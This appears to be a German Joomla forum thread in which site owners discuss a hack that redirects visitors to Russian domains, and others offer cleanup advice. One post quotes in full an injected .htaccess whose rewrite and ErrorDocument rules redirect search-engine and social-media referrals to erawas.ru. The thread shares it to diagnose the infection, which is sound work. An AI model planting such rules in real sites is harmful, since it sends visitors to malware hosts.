Willkommen, Gast
Benutzername: Passwort: Angemeldet bleiben:

THEMA: joomla hack: plat-tan.ru ???

joomla hack: plat-tan.ru ??? 1 Jahr 1 Monat her #78536

hallo zusammen...

hab in den letzten tagen ein seltsames verhalten auf einer meiner joomla seiten festgestellt. und zwar, dass bei facebook links auf diese seite die seite einerseits auf google.com weiterleitet und nicht auf die seite selbst.

andererseits, und vor allem geht es mir darum, scheint in der firefox web-console beim aufruf der seite eine seltsamer eintrag auf, nämlich:

[18:15:40.501] GET http:// plat-tan . ru / in.cgi?4 [HTTP/1.1 302 Found 1079ms]

ich nehme mal an, meine seite wurde gehackt :-( aber ich hab keine ahnung durch welche hintetür

das joomla system ist 1.5.26
firefox 11

kennt wer obige webadresse in russland????? ist das malware von irgendeiner extension????

ich hab jetzt einige stunden versucht im forum und im netz was zu diesem thema zu finden, also hoffe ich, dass ich keine forums-regeln durch dieses posting verletzt habe ;-)

lg
milliways
Letzte Änderung: 1 Jahr 1 Monat her von milliways. Begründung: webadresse codieren
Der Administrator hat öffentliche Schreibrechte deaktiviert.

Aw: joomla hack: plat-tan.ru ??? 1 Jahr 1 Monat her #78538

  • Jan
  • Jans Avatar
  • OFFLINE
  • JD Team
  • Beiträge: 8547
  • Dank erhalten: 434
Hallo milliways

Möglichkeiten Schadcode auf Webseiten zu bekommen gibt es viele, dazu ist nicht immer Zugriff auf die Seite selbst nötig. Sehr beilegt zum Beispiel Trojaner auf dem Rechnern der jeweiligen Administratoren, um an die FTP- und Zugangsdatendaten zu kommen. Ein Scan deines Rechners wäre also sicher nicht verkehrt.

Das entlastet natürlich nicht automatisch dein Joomla oder andere Systeme die auf deinem Webspace installiert sind. Dort würde ich zuerst alle öffentlichen Besucher per htaccess und Passwortabfrage aussperren damit du in Ruhe arbeiten kannst. Ist das geschehen kannst du diese Liste von den Kollegen von Joomla-Security abarbeiten.

www.joomla-security.de/joomla-gehackt-was-tun.html

Gruß Jan
Der Administrator hat öffentliche Schreibrechte deaktiviert.

Aw: joomla hack: plat-tan.ru ??? 1 Jahr 1 Monat her #78544

Hatte gerade so ne ähnliche Meldung und mein AV avast hat mich gewarnt mit folgender Meldung:

http:// gabplat .ru/in.cgi?4|{gzip}
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
HTML:RedirME-inf [Trj]


Prüfe deine .htaccess Dateien, da wurden Änderungen rein geschrieben und ändere am besten sofort das FTP-Passwort.

Mehr kann ich im Moment dazu auch nicht sagen. Also ob noch andere Dateien oder Einträge in der DB davon betroffen sind.

Ansonsten kann ich auch nur Jans Link empfehlen.

LG
Letzte Änderung: 1 Jahr 1 Monat her von Jan. Begründung: Link bearbeitet
Der Administrator hat öffentliche Schreibrechte deaktiviert.

Aw: joomla hack: plat-tan.ru ??? 1 Jahr 1 Monat her #78563

danke leute....

mein avira antivirus läuft gerade, hat auch schon "funde" :-/....

und ich hab mittels webftp über meinen provider die .htaccess datei geöffnet, und wurde auch fündig...

im file .htaccess (alle .htaccess files in allen verzeichnissen ;-/)
<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)


RewriteRule ^(.*)$ erawas.ru/in.cgi?4 [R=301,L]

RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)

RewriteRule ^(.*)$ erawas.ru/in.cgi?4 [R=301,L]

</IfModule>
ErrorDocument 400 erawas.ru/in.cgi?4

ErrorDocument 401 erawas.ru/in.cgi?4

ErrorDocument 403 erawas.ru/in.cgi?4

ErrorDocument 404 erawas.ru/in.cgi?4
ErrorDocument 500 erawas.ru/in.cgi?4

ich nehme mal an, dass zeux kann ich alles löschen, oder???

ftp paßwort für den server hab ich bereits geändert....
ich werd hier weiter den fortschritt posten und auch den link von jan nochmal durchgehen...

mod_rewrite ist in der konfiguration übgrigens "off", nicht wie oben im zitat "on"...
nervig das ganze :sick:
Der Administrator hat öffentliche Schreibrechte deaktiviert.

Aw: joomla hack: plat-tan.ru ??? 1 Jahr 1 Monat her #78564

  • wpunkt
  • wpunkts Avatar
  • OFFLINE
  • Neu hier
  • Beiträge: 43
  • Dank erhalten: 1
Ja, genau das Problem hatten wir auch kürzlich mit einer Joomla Installation 1.5..
Der Provider meldete uns, dass auch in anderen Verzeichnissen diese Dateien abgelegt waren.
Wir haben unsere Seite gelöscht, weil wir schon eine 2.5. auf einem anderen Server laufen hatten.
S.W.
Lieber verrückt die Welt genießen, als normal langweilen. :-)
Letzte Änderung: 1 Jahr 1 Monat her von wpunkt.
Der Administrator hat öffentliche Schreibrechte deaktiviert.

Aw: joomla hack: plat-tan.ru ??? 1 Jahr 1 Monat her #78570

  • Robson
  • Robsons Avatar
  • OFFLINE
  • Neu hier
  • Beiträge: 1
Hallo Miteinander,

meine Joomla Webseite wurde auch die letzten Tage gehackt. Ich habe auch das folgende Problem das in meiner ".htaccess" Datei irgendein Müll steht. Sobald ich die Datei via FTP lösche funktioniert alles einwandfrei. Jedoch wird ".htaccess" immer wieder von neuen generiert bzw. hochgeladen.....

Weiß jemand wie man die unterbinden kann bzw. was ich unternehmen muss damit die .htaccess Datei nicht immer wieder neu genertiert wird, ich möchte auf alle Fälle verhindert das ich meine Seite komplett löschen muss und von Neuem zu beginnen.

- joomla system ist 1.5.26
- firefox 11
- filezilla

Vielen Dank für euere Hilfe und Tipps
Der Administrator hat öffentliche Schreibrechte deaktiviert.
Moderatoren: sisko1990, Farrell
Kunena Forum